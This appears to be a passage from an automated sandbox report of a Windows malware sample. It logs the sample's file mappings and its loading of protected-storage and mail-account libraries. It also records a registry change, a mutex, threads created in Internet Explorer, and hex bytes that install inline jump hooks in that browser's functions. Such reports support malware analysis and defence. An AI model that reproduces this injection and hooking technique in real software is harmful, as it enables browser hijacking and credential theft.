C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ReadOutLoud.api query and read commit 7000000 110592 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\reflow.api write and read and execute commit 7830000 364544 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\reflow.api query and read commit 7830000 364544 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\reflow.api write and read and execute commit 7830000 364544 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\reflow.api query and read commit 7830000 364544 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SaveAsRTF.api write and read and execute commit 7830000 303104 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SaveAsRTF.api query and read commit 7830000 303104 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SaveAsRTF.api write and read and execute commit 7830000 303104 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SaveAsRTF.api query and read commit 7830000 303104 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search.api write and read and execute commit 7830000 356352 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search.api query and read commit 7830000 356352 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search.api write and read and execute commit 7830000 356352 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search.api query and read commit 7830000 356352 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search5.api write and read and execute commit 7000000 86016 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search5.api query and read commit 7000000 86016 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search5.api write and read and execute commit 7000000 86016 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search5.api query and read commit 7000000 86016 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SendMail.api write and read and execute commit 7000000 126976 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SendMail.api query and read commit 7000000 126976 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SendMail.api write and read and execute commit 7000000 126976 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SendMail.api query and read commit 7000000 126976 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Spelling.api write and read and execute commit 7830000 270336 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Spelling.api query and read commit 7830000 270336 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Spelling.api write and read and execute commit 7830000 270336 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Spelling.api query and read commit 7830000 270336 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Updater.api write and read and execute commit 7000000 167936 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Updater.api query and read commit 7000000 167936 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Updater.api write and read and execute commit 7000000 167936 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Updater.api query and read commit 7000000 167936 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\weblink.api write and read and execute commit 7000000 184320 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\weblink.api query and read commit 7000000 184320 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\weblink.api write and read and execute commit 7000000 184320 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\weblink.api query and read commit 7000000 184320 own pid readonly success or wait 1
C:\Program Files\Common Files\System\msadc\msadco.dll write and read and execute commit 7000000 143360 own pid execute success or wait 1
C:\Program Files\Common Files\System\msadc\msadco.dll query and write and read and execute image 4DDF0000 143360 own pid read write success or wait 1
\KnownDlls\MSDART.DLL write and read and execute unknown 4DDF0000 143360 own pid read write object name not found 1
C:\WINDOWS\system32\msdart.dll query and write and read and execute image 765B0000 151552 own pid read write success or wait 1
\KnownDlls\comdlg32.dll write and read and execute unknown 763B0000 299008 own pid read write success or wait 1
C:\Program Files\Common Files\System\msadc\msadco.dll query and read commit 7000000 65536 own pid readonly success or wait 1
C:\Program Files\Common Files\System\msadc\msadcor.dll write and read and execute commit 7010000 16384 own pid execute success or wait 1
C:\Program Files\Common Files\System\msadc\msadcor.dll query and write and read and execute image 7010000 16384 own pid read write conflicting addresses 1
\BaseNamedObjects\CTF.AsmListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown 7020000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MMB..AJGKK query and write and read commit 7020000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.Shared.SFM.ABH query and write and read and execute and extend size unknown 7D30000 524288 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MMB.B.AJGKK query and write and read commit 7020000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MMB.C.AJGKK query and write and read commit 7DB0000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MMB.D.AJGKK query and write and read commit 7DC0000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MMB.E.PJGKK query and write and read commit 7020000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MMB.F.PJGKK query and write and read commit 7020000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MMB.G.PJGKK query and write and read commit 7020000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.ABH.LB.PJGKK query and write and read and execute and extend size unknown 7020000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.ABH.MB.PJGKK query and write and read and execute and extend size unknown 7020000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.ABH.NB.PJGKK query and write and read and execute and extend size unknown 7020000 4096 own pid read write success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\net.dll write and read and execute commit 7DB0000 81920 own pid execute success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\net.dll query and write and read and execute image 6D4C0000 77824 own pid read write success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\dcpr.dll write and read and execute commit 7FB0000 147456 own pid execute success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\dcpr.dll query and write and read and execute image 6D1C0000 143360 own pid read write success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\EXCEL.EXE query and read commit 81B0000 10084352 own pid readonly success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\EXCEL.EXE query and read commit 81B0000 10084352 own pid readonly success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\EXCEL.EXE query and read commit 81B0000 10084352 own pid readonly success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\EXCEL.EXE query and read commit 81B0000 10084352 own pid readonly success or wait 1
\BaseNamedObjects\Global\RotHintTable read unknown 7FD0000 4096 own pid readonly success or wait 1
unknown query and write and read commit 7FE0000 4096 own pid read write success or wait 1
unknown query and write and read commit 7FE0000 4096 own pid read write success or wait 1
\BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011120120111202_index.dat_16384 write unknown 7FE0000 4096 own pid read write object name not found 1
\BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011120120111202_index.dat_16384 query and write and read commit 7FE0000 16384 own pid read write success or wait 1
unknown query and write and read commit 7FF0000 4096 own pid read write success or wait 1
unknown query and write and read commit 7FE0000 4096 own pid read write success or wait 1
unknown query and write and read commit 7FE0000 4096 own pid read write success or wait 1
\BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011120220111203_index.dat_32768 write unknown 7FE0000 32768 own pid read write success or wait 1
\BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011112820111205_index.dat_16384 write unknown 7FE0000 32768 own pid read write object name not found 1
\BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011112820111205_index.dat_16384 query and write and read commit 7FF0000 16384 own pid read write success or wait 1
\BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011112820111205_index.dat_32768 write unknown 7FF0000 16384 own pid read write object name not found 1
\BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011112820111205_index.dat_32768 query and write and read commit 7FF0000 32768 own pid read write success or wait 1
unknown query and write and read commit 8000000 4096 own pid read write success or wait 1
unknown query and write and read commit 7FE0000 4096 own pid read write success or wait 1
unknown query and write and read commit 7FE0000 4096 own pid read write success or wait 1
\BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011120820111209_index.dat_16384 write unknown 7FE0000 4096 own pid read write object name not found 1
\BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011120820111209_index.dat_16384 query and write and read commit 7FE0000 16384 own pid read write success or wait 1
\BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011120820111209_index.dat_32768 write unknown 7FE0000 16384 own pid read write object name not found 1
\BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011120820111209_index.dat_32768 query and write and read commit 7FE0000 32768 own pid read write success or wait 1
unknown query and write and read commit 8000000 4096 own pid read write success or wait 1
unknown query and write and read commit 8000000 4096 own pid read write success or wait 1
unknown query and write and read commit 8000000 4096 own pid read write success or wait 1
unknown query and write and read commit 8000000 4096 own pid readonly success or wait 1
unknown query and write and read commit 8000000 4096 own pid readonly success or wait 1
unknown query and write and read commit 8000000 4096 own pid readonly success or wait 1
unknown query and write and read commit 8000000 4096 own pid readonly success or wait 1
unknown query and write and read commit 8000000 4096 own pid read write success or wait 1
\BaseNamedObjects\ASMWIN0 write and read unknown 8000000 4096 own pid read write success or wait 1
\BaseNamedObjects\ASMWIN1 write and read unknown 8000000 4096 own pid read write success or wait 1
unknown query and write and read commit 8000000 4096 own pid read write success or wait 1
unknown query and write and read commit 8000000 4096 own pid read write success or wait 1
unknown query and write and read commit 8000000 4096 own pid readonly success or wait 1
\BaseNamedObjects\ASMWIN2 write and read unknown 8000000 4096 own pid read write success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\nio.dll write and read and execute commit 8000000 40960 own pid execute success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\nio.dll query and write and read and execute image 6D4E0000 36864 own pid read write success or wait 1
C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe query and write and read and execute and extend size image 6D4E0000 36864 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 8100000 1208320 own pid readonly success or wait 1
C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe query and read commit 8100000 258048 own pid readonly success or wait 1
C:\WINDOWS\system32\regsvr32.exe query and write and read and execute and extend size image 8100000 258048 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 8100000 1208320 own pid readonly success or wait 1
C:\WINDOWS\system32\regsvr32.exe write and read and execute commit 8230000 12288 own pid execute success or wait 1
C:\WINDOWS\system32\regsvr32.exe query and read commit 8230000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\regsvr32.exe write and read and execute commit 8240000 12288 own pid execute success or wait 1
C:\WINDOWS\system32\regsvr32.exe query and read commit 8230000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\regsvr32.exe query and read commit 8100000 12288 own pid readonly success or wait 1
C:\Documents and Settings\Administrator\Desktop\0.3635417184612467.exe query and write and read and execute and extend size image 8100000 12288 own pid readonly invalid file for section 1
C:\WINDOWS\system32\regsvr32.exe query and write and read and execute and extend size image 8100000 12288 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 8100000 1208320 own pid readonly success or wait 1
C:\WINDOWS\system32\regsvr32.exe write and read and execute commit 8230000 12288 own pid execute success or wait 1
C:\WINDOWS\system32\regsvr32.exe query and read commit 8230000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\regsvr32.exe write and read and execute commit 8230000 12288 own pid execute success or wait 1
C:\WINDOWS\system32\regsvr32.exe query and read commit 8100000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\regsvr32.exe query and read commit 8100000 12288 own pid readonly success or wait 1
\BaseNamedObjects\MSCTF.Shared.SFM.MMB query and write and read reserve 8100000 524288 own pid read write success or wait 1
unknown query and write and read commit 82A0000 12288 own pid read write success or wait 1
C:\WINDOWS\system32\msoeacct.dll write and read and execute commit 82A0000 253952 own pid execute success or wait 1
C:\WINDOWS\system32\msoeacct.dll write and read and execute commit 82A0000 253952 own pid execute success or wait 1
C:\WINDOWS\system32\msoeacct.dll query and write and read and execute image 68810000 270336 own pid read write success or wait 1
\KnownDlls\MSOERT2.dll write and read and execute unknown 68810000 270336 own pid read write object name not found 1
C:\WINDOWS\system32\msoert2.dll query and write and read and execute image 76880000 139264 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 82B0000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 82B0000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 82B0000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 82D0000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 82D0000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 82D0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\acctres.dll write and read and execute commit 82D0000 65536 own pid execute success or wait 1
C:\WINDOWS\system32\acctres.dll write and read and execute commit 82D0000 65536 own pid execute success or wait 1
C:\WINDOWS\system32\acctres.dll query and write and read and execute image 71780000 73728 own pid read write success or wait 1
C:\Program Files\Common Files\System\wab32.dll write and read and execute commit 82F0000 512000 own pid execute success or wait 1
C:\Program Files\Common Files\System\wab32.dll write and read and execute commit 82F0000 512000 own pid execute success or wait 1
C:\Program Files\Common Files\System\wab32.dll query and write and read and execute image 470D0000 528384 own pid read write success or wait 1
C:\Program Files\Common Files\System\wab32res.dll write and read and execute commit 82F0000 249856 own pid execute success or wait 1
C:\Program Files\Common Files\System\wab32res.dll write and read and execute commit 82F0000 249856 own pid execute success or wait 1
C:\Program Files\Common Files\System\wab32res.dll query and write and read and execute image 35F40000 258048 own pid read write success or wait 1
unknown query and write and read commit 82D0000 12288 own pid read write success or wait 1
C:\WINDOWS\system32\msident.dll write and read and execute commit 82D0000 53248 own pid execute success or wait 1
C:\WINDOWS\system32\msident.dll write and read and execute commit 82D0000 53248 own pid execute success or wait 1
C:\WINDOWS\system32\msident.dll query and write and read and execute image 608A0000 61440 own pid read write success or wait 1
C:\WINDOWS\system32\msident.dll read commit 82D0000 53248 own pid readonly success or wait 1
C:\WINDOWS\system32\msidntld.dll write and read and execute commit 82D0000 16384 own pid execute success or wait 1
C:\WINDOWS\system32\msidntld.dll write and read and execute commit 82D0000 16384 own pid execute success or wait 1
C:\WINDOWS\system32\msidntld.dll query and write and read and execute image 60890000 24576 own pid read write success or wait 1
\KnownDlls\PSTOREC.DLL write and read and execute unknown 60890000 24576 own pid read write object name not found 1
C:\WINDOWS\system32\pstorec.dll query and write and read and execute image 5E0C0000 53248 own pid read write success or wait 1
\KnownDlls\ATL.DLL write and read and execute unknown 5E0C0000 53248 own pid read write object name not found 1
C:\WINDOWS\system32\atl.dll query and write and read and execute image 76B20000 69632 own pid read write success or wait 1
unknown query and write and read commit C40000 12288 own pid read write success or wait 1
\BaseNamedObjects\ASMWIN0 query and write and read commit C40000 12288 own pid read write success or wait 1
unknown query and write and read commit CB0000 12288 own pid read write success or wait 1
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
Registry Activities:
+ Key value replaced with new
Key Path Name Type Old Data New Data Completion Count Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir 15807505 Dword -1521036860 -1521036924 success or wait 1 8005F0A
+ Key value queried
Key Path Name Completion Count Source Address
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell Enabled object name not found 1 8005EB7
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell EnabledV8 success or wait 1 8005EB7
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell CleanCookies success or wait 1 8005FBA
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell CleanCookies success or wait 1 8005EB7
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell 1406 success or wait 5 8005EB7
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell 1609 success or wait 5 8005EB7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir 15807505 success or wait 1 8005F47
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir 15807505 success or wait 1 8005F7A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Account Manager\Accounts NULL success or wait 1 8005EB7
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44} object name exists 1 8020DFC
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
1276 1712 7C8106F9 false C:\Program Files\Internet Explorer\iexplore.exe success or wait 1 8018106
2128 1712 7C8106F9 false C:\Program Files\Internet Explorer\iexplore.exe success or wait 1 8018106
2736 1712 7C8106F9 false C:\Program Files\Internet Explorer\iexplore.exe success or wait 1 8018106
2812 1712 7C8106F9 false C:\Program Files\Internet Explorer\iexplore.exe success or wait 1 8018106
Memory Activities:
+ Memory read
PID Filepath Base Length Value Completion Count Source Address
1712 C:\Program Files\Internet Explorer\iexplore.exe 7C90D1AE 30 B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 7C91632D 30 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 77212EBC 30 8B FF 55 8B EC 83 EC 14 53 33 DB 56 33 F6 33 C0 39 5D 08 57 89 5D F8 89 5D EC 89 5D FC 75 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 771C60A1 30 8B FF 55 8B EC 6A 13 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 36 C6 FF FF 5D success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 771CE9C1 30 8B FF 55 8B EC 83 EC 14 53 56 33 C0 57 33 D2 33 DB 33 FF 33 C9 39 55 08 89 45 F8 89 45 EC success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 77212FC1 30 8B FF 55 8B EC 53 56 57 33 DB 33 C0 33 C9 33 D2 33 FF 39 5D 10 75 39 8B 75 0C 85 F6 74 21 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 771C4D8C 30 8B FF 55 8B EC 51 51 53 56 33 DB 33 F6 F6 05 94 BD 23 77 01 89 5D FC 0F 84 BA 7E 00 00 39 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 771C82EA 30 8B FF 55 8B EC 83 EC 24 53 33 DB 39 1D 8C B8 23 77 57 89 5D F4 89 5D F8 89 5D F0 C7 45 E8 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 771F9100 30 8B FF 55 8B EC 83 EC 20 53 56 33 C0 57 33 FF 40 39 3D 8C B8 23 77 89 7D FC 89 7D F8 89 45 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 771D89F7 30 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D 8C B8 23 77 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 771C79C2 30 6A 2C 68 10 7B 1C 77 E8 A7 9C FE FF 33 DB 89 5D DC 89 5D E4 39 1D 8C B8 23 77 0F 84 E8 95 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 771F9C53 30 8B FF 55 8B EC 6A 01 FF 75 0C FF 75 08 E8 1A F4 FD FF 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 771D9064 30 8B FF 55 8B EC 6A 00 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 771BB1D8 30 8B FF 55 8B EC 83 EC 48 53 8B 5D 10 56 33 F6 39 75 14 57 8B 7D 0C C7 45 F4 01 00 00 00 89 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 71AB3E2B 30 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 71AB4C27 30 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 71AB68FA 30 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 71AB676F 30 8B FF 55 8B EC 83 EC 10 53 33 DB 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 5E 4A 00 00 8D 45 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 71AB4CB5 30 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 80 65 00 00 8D 45 F8 50 E8 DD success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 7E41ECA3 30 B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 7E41FE6E 30 B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 7E428D20 30 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 7E42C17E 30 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 7E423D3A 30 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 7E43E577 30 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 7E430833 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 7E44F965 30 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 7E430A47 30 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 7E44F9B4 30 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 7E42A01E 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 1 801F078
+ Memory written
PID Filepath Base Length Value Completion Count Source Address
1712 C:\Program Files\Internet Explorer\iexplore.exe 8190000 10 B8 35 00 00 00 E9 A9 D1 77 74 success or wait 1 801F0EC
1712 C:\Program Files\Internet Explorer\iexplore.exe 7C90D1AE 5 E9 A4 AE 70 8B success or wait 1 801F11A
1712 C:\Program Files\Internet Explorer\iexplore.exe 819000A 10 68 6C 02 00 00 E9 1E 63 78 74 success or wait 1 801F0EC
1712 C:\Program Files\Internet Explorer\iexplore.exe 7C91632D 5 E9 09 1F 70 8B success or wait 1 801F11A
1712 C:\Program Files\Internet Explorer\iexplore.exe 8190014 10 8B FF 55 8B EC E9 A3 2E 08 6F success or wait 1 801F0EC
1712 C:\Program Files\Internet Explorer\iexplore.exe 77212EBC 5 E9 FD 4B DF 90 success or wait 1 801F11A
1712 C:\Program Files\Internet Explorer\iexplore.exe 819001E 10 8B FF 55 8B EC E9 7E 60 03 6F success or wait 1 801F0EC
1712 C:\Program Files\Internet Explorer\iexplore.exe 771C60A1 5 E9 6F 1A E4 90 success or wait 1 801F11A
1712 C:\Program Files\Internet Explorer\iexplore.exe 8190028 10 8B FF 55 8B EC E9 94 E9 03 6F success or wait 1 801F0EC
1712 C:\Program Files\Internet Explorer\iexplore.exe 771CE9C1 5 E9 A6 91 E3 90 success or wait 1 801F11A
1712 C:\Program Files\Internet Explorer\iexplore.exe 8190032 10 8B FF 55 8B EC E9 8A 2F 08 6F success or wait 1 801F0EC
1712 C:\Program Files\Internet Explorer\iexplore.exe 77212FC1 5 E9 4B 4C DF 90 success or wait 1 801F11A
1712 C:\Program Files\Internet Explorer\iexplore.exe 819003C 10 8B FF 55 8B EC E9 4B 4D 03 6F success or wait 1 801F0EC
1712 C:\Program Files\Internet Explorer\iexplore.exe 771C4D8C 5 E9 25 2F E4 90 success or wait 1 801F11A
1712 C:\Program Files\Internet Explorer\iexplore.exe 8190046 10 8B FF 55 8B EC E9 9F 82 03 6F success or wait 1 801F0EC
1712 C:\Program Files\Internet Explorer\iexplore.exe 771C82EA 5 E9 0A FA E3 90 success or wait 1 801F11A
1712 C:\Program Files\Internet Explorer\iexplore.exe 8190050 10 8B FF 55 8B EC E9 AB 90 06 6F success or wait 1 801F0EC
1712 C:\Program Files\Internet Explorer\iexplore.exe 771F9100 5 E9 34 EC E0 90 success or wait 1 801F11A
1712 C:\Program Files\Internet Explorer\iexplore.exe 819005A 10 8B FF 55 8B EC E9 98 89 04 6F success or wait 1 801F0EC
1712 C:\Program Files\Internet Explorer\iexplore.exe 771D89F7 5 E9 8B F3 E2 90 success or wait 1 801F11A
1712 C:\Program Files\Internet Explorer\iexplore.exe 8190064 12 6A 2C 68 10 7B 1C 77 E9 59 79 03 6F success or wait 1 801F0EC
1712 C:\Program Files\Internet Explorer\iexplore.exe 771C79C2 5 E9 F0 03 E4 90 success or wait 1 801F11A
1712 C:\Program Files\Internet Explorer\iexplore.exe 8190070 10 8B FF 55 8B EC E9 DE 9B 06 6F success or wait 1 801F0EC
1712 C:\Program Files\Internet Explorer\iexplore.exe 771F9C53 5 E9 B4 E1 E0 90 success or wait 1 801F11A
1712 C:\Program Files\Internet Explorer\iexplore.exe 819007A 10 8B FF 55 8B EC E9 E5 8F 04 6F success or wait 1 801F0EC
1712 C:\Program Files\Internet Explorer\iexplore.exe 771D9064 5 E9 BB ED E2 90 success or wait 1 801F11A
1712 C:\Program Files\Internet Explorer\iexplore.exe 8190084 10 8B FF 55 8B EC E9 4F B1 02 6F success or wait 1 801F0EC
1712 C:\Program Files\Internet Explorer\iexplore.exe 771BB1D8 5 E9 5F CC E4 90 success or wait 1 801F11A
1712 C:\Program Files\Internet Explorer\iexplore.exe 819008E 10 8B FF 55 8B EC E9 98 3D 92 69 success or wait 1 801F0EC
1712 C:\Program Files\Internet Explorer\iexplore.exe 71AB3E2B 5 E9 3E E9 55 96 success or wait 1 801F11A
+ Memory allocated
